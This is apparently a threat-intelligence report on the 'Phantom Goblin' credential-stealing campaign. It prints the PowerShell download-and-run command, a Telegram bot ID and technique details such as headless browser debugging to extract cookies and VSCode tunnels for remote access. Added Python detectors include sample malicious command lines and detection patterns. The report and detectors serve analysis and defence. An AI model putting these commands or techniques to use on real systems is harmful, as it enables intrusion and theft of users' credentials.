Phantom Goblin: Covert Credential Theft and VSCode Tunnel Exploitation

Summary

A newly identified malware strain is being distributed through RAR attachments, using social engineering techniques to deceive users into executing a malicious LNK file disguised as a legitimate document. Once executed, this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository, allowing the malware to perform various malicious activities while operating stealthily.

The malware primarily targets web browsers and developer tools for data theft and unauthorized system access. It forcefully terminates browser processes to extract sensitive information such as cookies, login credentials, and browsing history. Additionally, it leverages Visual Studio Code tunnels to establish unauthorized remote access, allowing the threat actor (TA) to control compromised systems without triggering traditional security alerts. By disguising itself as legitimate applications, the malware effectively bypasses detection while exfiltrating stolen data through a Telegram bot. To evade security mechanisms, the malware abuses trusted tools like PowerShell and GitHub, blending its activities into normal system operations. The stolen data is archived into JSON and ZIP files before being transmitted to a TA-controlled Telegram account. This stealthy exfiltration technique makes it difficult for traditional security solutions to detect and block the attack. For tracking purposes, we are naming this operation "Phantom Goblin." The figure below shows the overall infection chain.

Technical Details

Cyble Research and Intelligence Labs (CRIL) has identified malware distribution leveraging RAR attachments. While the exact initial infection vector remains uncertain, it is suspected that these RAR attachments are being delivered via spam emails to target unsuspecting users. The TA employs social engineering techniques to trick users into executing a malicious shortcut (LNK) file disguised as a legitimate document. Specifically, the RAR archive file named "Proofs.rar" contains an LNK file named "document.lnk", which is designed to resemble a PDF document. This deceptive naming strategy is intended to lure unsuspecting users into clicking the shortcut file, believing it to be a legitimate document, as shown below.

Upon execution, the malicious LNK file initiates a PowerShell command that retrieves and executes a remote script from a GitHub repository. The command is designed to run stealthily, leveraging PowerShell to silently execute the script, potentially facilitating further malicious activities.

● C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w h -c iex(iwr 'hxxps://raw.githubusercontent[.]com/eagle-1337/x/main/x')

The PowerShell script ensures persistence by adding a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, allowing it to execute the script from the GitHub repository every time the system starts. It then defines a set of payloads with filenames resembling legitimate applications, such as updater.exe, vscode.exe, and browser.exe, and assigns a base URL from which these files will be downloaded. These files are Go-compiled binaries that have been packed using UPX.

The script checks whether each payload already exists in the system's temporary directory. If not, it fetches the corresponding file from GitHub using Invoke-WebRequest. Once downloaded, the payloads are executed discreetly in the background with no visible windows, ensuring the attack remains stealthy while maintaining control over the compromised system.
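The dropper stage described above is a compact detection target: a hidden-window PowerShell with an Invoke-Expression wrapped around an Invoke-WebRequest result, and a Run-key value that repeats the same cradle at every logon. The following Python is an added example, not code from the report or from Cyble. It scans Sysmon-style process-creation and registry-value-set records for that combination. The record field names (id, image, cmd, target, details), the GitHub account name EXAMPLE-ACCOUNT, the Run value name and every sample value are constructed for the example; the only campaign-specific strings kept are the flag combination -nop -w h -c and the raw.githubusercontent.com host quoted in the report.

```python
"""Added example (not the report's code): flag the PowerShell download cradle
and the Run-key persistence described above in Sysmon-style events."""
import re

# Traits of the dropper command line: no profile, hidden window, and an
# Invoke-Expression wrapped around an Invoke-WebRequest (a download cradle).
NO_PROFILE = re.compile(r"(?i)(?:^|\s)-no(?:p|profile)\b")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\s*\(\s*(?:iwr|invoke-webrequest|curl|wget)\b")
RAW_GITHUB = re.compile(r"(?i)https?://raw\.githubusercontent\.com/")
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")

# Constructed sample events modelled on Sysmon ID 1 (process creation) and
# ID 13 (registry value set). EXAMPLE-ACCOUNT is a placeholder, not a real repo.
CRADLE = "-nop -w h -c iex(iwr 'https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/x/main/x')"
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe " + CRADLE},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": "powershell.exe " + CRADLE},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # benign admin script
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]


def score_cmdline(cmd):
    """Return the suspicious traits present in a PowerShell command line, in a fixed order."""
    traits = []
    if NO_PROFILE.search(cmd):
        traits.append("no_profile")
    if HIDDEN_WINDOW.search(cmd):
        traits.append("hidden_window")
    if DOWNLOAD_CRADLE.search(cmd):
        traits.append("iex_download_cradle")
    if RAW_GITHUB.search(cmd):
        traits.append("raw_github_source")
    return traits


def is_cradle(traits):
    """A download cradle alone is enough; otherwise require hidden window plus a remote source."""
    return "iex_download_cradle" in traits or (
        "hidden_window" in traits and "raw_github_source" in traits)


def detect(events):
    """Scan records: id 1 = process creation, id 13 = registry value set. Returns alerts."""
    alerts = []
    for ev in events:
        if ev["id"] == 1 and ev["image"].lower().endswith("powershell.exe"):
            traits = score_cmdline(ev["cmd"])
            if is_cradle(traits):
                alerts.append(("powershell_download_cradle", traits, ev["cmd"]))
        elif ev["id"] == 13 and RUN_KEY.search(ev["target"]):
            # Persistence: a Run value that re-launches the remote cradle at logon.
            traits = score_cmdline(ev["details"])
            if "powershell" in ev["details"].lower() and is_cradle(traits):
                alerts.append(("run_key_powershell_cradle", traits, ev["target"]))
    return alerts


if __name__ == "__main__":
    for rule, traits, where in detect(SAMPLE_EVENTS):
        print(rule, traits, where)
```

The benign `-NoProfile -File backup.ps1` launch scores one trait but never satisfies `is_cradle`, which is the point of requiring the cradle itself or the hidden-window-plus-remote-source pair rather than alerting on any single flag.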

Updater.exe

The Updater.exe file attempts to steal cookies from Chrome, Brave, and Edge browsers by first checking for any running instances of these browsers. It does this by executing the tasklist command to identify active processes. If any browser processes are found, it forcefully terminates them using taskkill.exe. This termination ensures that the browser's files, including cookie storage, are not in use or locked, allowing the malware to access and extract cookie data without interference.

After terminating the browsers, the malware launches a new instance of the targeted browser using the default user profile directory. It runs the browser in headless mode, meaning there is no visible user interface, and enables remote debugging on port 9222. Because the browser process itself decrypts its cookies and exposes them over the DevTools debugging interface, this technique lets the malware bypass App Bound Encryption (ABE) and extract cookie data without the user noticing.

The extracted cookie data is archived, and the archive is then transmitted to a TA-controlled Telegram account using the sendDocument method of the Telegram Bot API. This allows the TA to receive the stolen cookies remotely without direct interaction, ensuring stealthy exfiltration of sensitive browsing data.

Vscode.exe

The “vscode.exe” binary establishes a Visual Studio Code (VSCode) tunnel on the victim’s system and exfiltrates its connection details to a TA-controlled Telegram bot. This enables unauthorized remote access while evading traditional security detections.

Upon execution, the “vscode.exe” first checks for any running instances of VSCode by querying active processes using the tasklist command. If it detects “code.exe”, it forcefully terminates the process using taskkill /F /IM code.exe, ensuring that the legitimate VSCode application is closed. This step likely prevents interference from an existing instance and allows the malware to deploy its own version of VSCode without user detection.

Following this, the malware executes a PowerShell command that downloads a ZIP file of Visual Studio Code from its official update URL and saves it as “vscode.zip” in a temporary directory named “vscode_temp”. This approach helps maintain the appearance of legitimacy by using a genuine copy of VSCode while allowing the TA to manipulate its execution for malicious purposes.

Once the download is complete, the malware executes another PowerShell command that extracts the “vscode.zip” archive using the “Expand-Archive” command, placing its contents into the specified temporary directory. This prepares the extracted files for further execution.

The malware now initiates another PowerShell script to interact with the extracted VSCode binaries. The script navigates to the extracted VSCode directory and logs out any active tunnel sessions using the command “./code.exe tunnel user logout”. This step ensures that no pre-existing VSCode tunnels remain active, likely to prevent conflicts or avoid detection by the legitimate user. Following a 10-second delay, the script launches “code.exe” with the command “tunnel --randomname --accept-server-license-terms”, redirecting its output to a file named “output.txt”. The execution is performed in a hidden window to avoid raising suspicion. The “output.txt” file captures the details of the newly created VSCode tunnel connection, which the TA then exploits. The figure below shows the content of the output.txt.

After another 10-second delay, the script reads the contents of output.txt, which contains the victim’s VSCode tunnel connection details, and exfiltrates this information to the TA's Telegram bot using an API request. The bot token and chat ID are hardcoded into the script, allowing the TA to receive the compromised tunnel credentials in real time. By leveraging VSCode tunnels, the TA can establish remote access to the victim’s system while avoiding traditional security detection methods. The figure below shows the PowerShell code responsible for creating the VSCode tunnel.
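Updater.exe and vscode.exe follow the same pattern: kill the legitimate process with taskkill, then relaunch the same executable under the malware's control, either a headless browser with remote debugging enabled or code.exe with the tunnel subcommand. The Python below is an added example, not the report's or Cyble's code, that correlates the two steps on a timeline of process-creation events and raises the severity when the relaunch follows a kill of the same image within a short window. The event format, the 120-second window, the vscode_temp path under %TEMP% and all sample command lines are constructed; --headless and --remote-debugging-port are Chromium's own flags and tunnel is VS Code's CLI subcommand, but the exact command lines the malware uses are assumed here.

```python
"""Added example (not the report's code): correlate a taskkill of a browser or
of code.exe with a suspicious relaunch of the same image shortly afterwards."""
import re

# Images the report says are killed and then relaunched under malware control.
BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe"}
TASKKILL_IMAGE = re.compile(r"(?i)taskkill(?:\.exe)?\b.*?/IM\s+(\S+)")
DEBUG_PORT = re.compile(r"(?i)--remote-debugging-port=(\d+)")
HEADLESS = re.compile(r"(?i)--headless\b")
KILL_WINDOW_SECONDS = 120  # assumed correlation window, not from the report

# Constructed process-creation events {ts (seconds), image, cmd}, in time order.
TEMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"ts": 100, "image": r"C:\Windows\System32\taskkill.exe", "cmd": "taskkill /F /IM chrome.exe"},
    {"ts": 102, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": 'chrome.exe --headless --remote-debugging-port=9222 '
            '--user-data-dir="C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data"'},
    {"ts": 400, "image": r"C:\Windows\System32\taskkill.exe", "cmd": "taskkill /F /IM code.exe"},
    {"ts": 415, "image": TEMP + r"\vscode_temp\code.exe", "cmd": "./code.exe tunnel user logout"},
    {"ts": 425, "image": TEMP + r"\vscode_temp\code.exe",
     "cmd": "./code.exe tunnel --random-name --accept-server-license-terms"},
    {"ts": 900, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "chrome.exe"},
    {"ts": 950, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmd": "msedge.exe --headless --remote-debugging-port=9333"},  # no preceding kill
]


def image_name(path):
    """Lower-case file name of an image path, accepting / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def correlate(events, window=KILL_WINDOW_SECONDS):
    """Walk events in time order; return alerts for suspicious relaunches."""
    last_kill = {}  # image name -> timestamp of the last taskkill aimed at it
    alerts = []
    for ev in events:
        name, cmd = image_name(ev["image"]), ev["cmd"]
        if name == "taskkill.exe":
            m = TASKKILL_IMAGE.search(cmd)
            if m:
                last_kill[m.group(1).lower()] = ev["ts"]
            continue
        killed_at = last_kill.get(name)
        after_kill = killed_at is not None and 0 <= ev["ts"] - killed_at <= window
        if name in BROWSERS:
            port = DEBUG_PORT.search(cmd)
            if port and HEADLESS.search(cmd):
                alerts.append({"rule": "headless_browser_remote_debugging", "ts": ev["ts"],
                               "image": name, "port": int(port.group(1)),
                               "after_kill": after_kill,
                               "severity": "high" if after_kill else "medium"})
        elif name == "code.exe":
            args = cmd.split()[1:]
            if "tunnel" in args:
                alerts.append({"rule": "vscode_tunnel", "ts": ev["ts"], "image": name,
                               "args": " ".join(args), "after_kill": after_kill,
                               "accepts_license": "--accept-server-license-terms" in args,
                               "severity": "high" if after_kill else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

A headless, debug-enabled browser or a code.exe tunnel with no preceding kill still produces a medium alert, since developers and automation do launch these legitimately; the kill-then-relaunch sequence on the same image within the window is what separates this campaign's behaviour from that noise.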

Browser.exe

“Browser.exe” collects a wide range of browser-related data, including browsing history, visited websites, login credentials, tracking data, session details, cookies, downloaded files, form inputs, personalization settings, and installed extensions. It targets multiple widely used browsers, as listed in the table below.

#    Browser Name
1    Google Chrome
2    Microsoft Edge
3    Brave Browser
4    Google Chrome Beta
5    Chromium Browser
6    Opera Browser
7    Opera GX Browser
8    Vivaldi Browser
9    Mozilla Firefox
10   Yandex Browser
11   Coc Coc Browser
12   Sogou Explorer
13   360 Secure Browser
14   Arc Browser

Before collecting browser information, it forcefully terminates processes associated with the targeted browsers using the taskkill command to prevent file access conflicts and ensure unrestricted data extraction.

The malware now extracts various types of sensitive information from the targeted browsers. The extracted data comes from files such as Login Data, Cookies, History, Web Data, Preferences, IndexedDB, Session Storage, Local Storage, Brave Wallet Storage, and the Affiliation Database. Following this, the malware organizes the data into .json files within the %temp%\results directory. Each file is named following the pattern __.json, as shown in the image below.

Finally, the stolen data is archived into a single ZIP file named %username%.zip and then transmitted to a Telegram channel using the sendDocument API. The exfiltration process utilizes Telegram Bot ID 8105027522 along with an authentication token. The TA also generates a logs.txt file in the %temp% directory to record all activities executed by the stealer. Each log entry is prefixed with the marker [goblin], as shown in the image below.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

Safety Measures to Prevent Ransomware Attacks

● Avoid opening unexpected RAR, ZIP, or LNK files, even if they appear to come from trusted contacts, without verifying the source.

● Enable advanced email filtering to block potentially malicious attachments and ensure all attachments are scanned with updated security solutions before execution.

● Enforce strict access controls and authentication mechanisms to disable or restrict the use of VSCode tunnels by unauthorized users.

● Deploy robust endpoint protection with real-time threat detection to identify malicious processes, such as PowerShell execution, unusual registry changes, and suspicious file downloads.

● Restrict the use of PowerShell and script execution on end-user systems unless necessary.

● Implement strict browser security policies and access controls to prevent unauthorized debugging and restrict direct access to sensitive browser data.

● Monitor outbound network traffic for suspicious connections, including unusual Telegram API activity or untrusted external servers.
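The last recommendation, watching outbound traffic for Telegram Bot API use, becomes a concrete check because the Bot API carries the bot ID in the request path (https://api.telegram.org/bot<bot_id>:<secret>/<method>). The Python below is an added example, not from the report or from Cyble: it parses constructed proxy log lines, extracts the bot ID, masks the secret before it reaches alert output, and scores upload-style methods such as sendDocument. It assumes a TLS-inspecting proxy or endpoint HTTP telemetry that records full URLs; the log format, the byte threshold, the dates, client addresses and token secrets are all constructed, and only the bot ID 8105027522 comes from the report.

```python
"""Added example (not the report's code): surface Telegram Bot API use in
outbound HTTP logs, keyed on the bot ID embedded in the request path."""
import re

# Bot API URL layout: https://api.telegram.org/bot<bot_id>:<secret>/<method>
BOT_CALL = re.compile(
    r"(?i)https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[\w-]+)/(?P<method>[a-z]+)")
UPLOAD_METHODS = {"senddocument", "sendphoto", "sendmessage"}
LARGE_UPLOAD_BYTES = 100_000  # assumed threshold, not from the report
# Watchlist: the bot ID the report names as the exfiltration channel.
KNOWN_BAD_BOT_IDS = {"8105027522"}

# Constructed proxy log lines: "<ts> <client> <http_method> <url> <status> <bytes_sent>".
# The token secrets are placeholders, not real credentials.
SAMPLE_PROXY_LOG = [
    "2025-03-05T10:15:02Z 10.0.0.23 POST https://api.telegram.org/bot8105027522:AAExampleSecretNotReal/sendDocument 200 2481902",
    "2025-03-05T10:15:09Z 10.0.0.23 GET https://api.telegram.org/bot8105027522:AAExampleSecretNotReal/getMe 200 412",
    "2025-03-05T10:16:44Z 10.0.0.41 GET https://www.example.org/index.html 200 1280",
    "2025-03-05T10:20:10Z 10.0.0.77 POST https://api.telegram.org/bot123456789:AAOtherExampleSecret/sendMessage 200 610",
]


def parse_line(line):
    """Split one constructed proxy log line into a record with typed fields."""
    ts, client, http_method, url, status, sent = line.split()
    return {"ts": ts, "client": client, "http_method": http_method,
            "url": url, "status": int(status), "bytes_sent": int(sent)}


def mask_token(bot_id, secret):
    """Keep the bot ID (the useful pivot) and hide the secret from alert output."""
    return f"{bot_id}:{secret[:3]}..."


def analyze(lines):
    """Return one alert per Telegram Bot API request, with reasons and a severity."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        m = BOT_CALL.search(rec["url"])
        if not m:
            continue
        method = m.group("method")
        reasons = []
        if m.group("bot_id") in KNOWN_BAD_BOT_IDS:
            reasons.append("known_bad_bot_id")
        if rec["http_method"] == "POST" and method.lower() in UPLOAD_METHODS:
            reasons.append("upload_method")
        if rec["bytes_sent"] >= LARGE_UPLOAD_BYTES:
            reasons.append("large_upload")
        if "known_bad_bot_id" in reasons or {"upload_method", "large_upload"} <= set(reasons):
            severity = "high"
        elif reasons:
            severity = "medium"
        else:
            severity = "low"  # any Bot API traffic from a workstation is worth a look
        alerts.append({"ts": rec["ts"], "client": rec["client"], "bot_id": m.group("bot_id"),
                       "token": mask_token(m.group("bot_id"), m.group("secret")),
                       "api_method": method, "bytes_sent": rec["bytes_sent"],
                       "reasons": reasons, "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_PROXY_LOG):
        print(alert)
```

The bot ID survives into the alert because it is the pivot an analyst needs to link sightings across hosts and to match a watchlist, while the secret half of the token is masked so that alert storage does not itself become a place where the credential can be read.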

Conclusion

This malware attack highlights the increasing sophistication of cyber threats that leverage social engineering and trusted tools for stealthy execution. By disguising itself within a RAR attachment, it deceives users into executing a malicious LNK file that initiates PowerShell-based attacks. The malware is designed to steal browser data, establish unauthorized remote access via VSCode tunnels, and exfiltrate sensitive information while avoiding detection. It terminates active browser processes to access stored data, uses remote debugging for extraction, and archives stolen information before transmitting it through encrypted channels. Sigma rules [1],[2] to detect this campaign are available for download from the linked GitHub repository.

Written by

FPT Metrodata Indonesia